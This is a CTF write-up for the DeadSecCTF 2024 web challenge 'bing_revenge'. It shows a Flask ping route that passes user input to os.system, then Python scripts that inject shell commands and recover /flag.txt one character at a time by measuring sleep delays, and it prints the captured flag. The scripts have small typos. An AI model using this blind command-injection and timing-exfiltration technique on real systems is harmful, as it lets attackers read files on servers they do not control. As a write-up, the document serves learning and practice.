Post

DeadSecCTF 2024 web/bing_revenge

My solution for DeadSecCTF web/bing_revenge challenge

Posted
By null_byte
2 min read

Command Injection with Time-Based Data Exfiltration

On the /flag endpoint, we can ping an IP, but due to the source code, we cannot see the output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

@app.route("/flag", methods=["GET", "POST"])
def ping():
    if request.method == "POST":
        host = request.form.get("host")
        cmd = f"{host}"

        if not cmd:
            return render_template("ping_result.html", data="Hello")
        try:
            output = os.system(f"ping -c 4 {cmd}")
            return render_template("ping_result.html", data="DeadSecCTF2024")
        except subprocess.CalledProcessError:
            return render_template(
                "ping_result.html", data=f"error when executing command"
            )
        except subprocess.TimeoutExpired:
        return render_template("ping_result.html", data="Command timed out")

    return render_template("ping.html")

So, we need to perform command injection with time-based data exfiltration.
First, we can to figure out the length of the flag but it’s not necessary:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

import requests
import time

url = "https://aa0d0d142bd8f144e6eee8e2.deadsec.quest/flag"

for length in range(1, 100):
    payload = f"1.1.1.1; if [ $(wc -c < /flag.txt) -eq {length} ]; then sleep 25; else sleep 0; fi;"
    start_time = time.time()
    requests.get(url, params={"host": payload}, verify=False)
    elapsed_time = time.time() - start_time
    if elapsed_time > 25:
        flag_length = lengt
        break

print(f"Flag length: {flag_length})

Flag exfiltration

Then, we need to exfiltrate the flag content character by character:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

import requests
import time
import warnings
import logging
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Ignore urllib3 annoying warnings
warnings.simplefilter("ignore", InsecureRequestWarning)

logging.basicConfig(
    level=logging.DEBUG, format="%(asctime)s - %(levelname)s - %(message)s"
)

url = "https://aa0d0d142bd8f144e6eee8e2.deadsec.quest/flag"
flag = "DEAD{" # known part of the flag
flag_length = 42 # chars
known_chars = "0123456789abcdef-}" # my guess after some tries with uppercase etc. Previous web flag had such chars.

# measure time of POST request
def send_request(payload):
    start_time = time.time()
    response = requests.post(url, data={"host": payload}, verify=False)
    elapsed_time = time.time() - start_time
    return elapsed_time, response.status_code


for i in range(len(flag) + 1, flag_length + 1):
    match_found = False
    for c in known_chars:
        payload = f'1.1.1.1; if [ "$(cut -c{i} /flag.txt)" = "{c}" ]; then sleep 25; else sleep 0; fi;'
        elapsed_time, status_code = send_request(payload)
        logging.debug(
            f"Payload: {payload}, Elapsed Time: {elapsed_time}, Status Code: {status_code}"
        )

        if status_code == 200 and elapsed_time > 25:
            flag += c
            logging.info(f"Flag so far: {flag}")
            match_found = True
            break

    if not match_found:
        flag += "?"
        logging.warning(f"No match found for position {i}. Flag so far: {flag}")

logging.info(f"Exfiltrated flag: {flag}")

Flag

Flag value:

1

DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}

I struggled with this challenge for a long time. I got the flag locally very quickly,
but on the CTF server, I encountered a bunch of 404, 500, or 503 errors, crashing instances, etc.
After several attempts, I noticed that the standard response time for a request was 12-13 seconds,
so I safely added a sleep value of 25 to ensure my assumption was correct.

CTF, DeadSec
ctf writeup deadsec
This post is licensed under CC BY 4.0 by the author.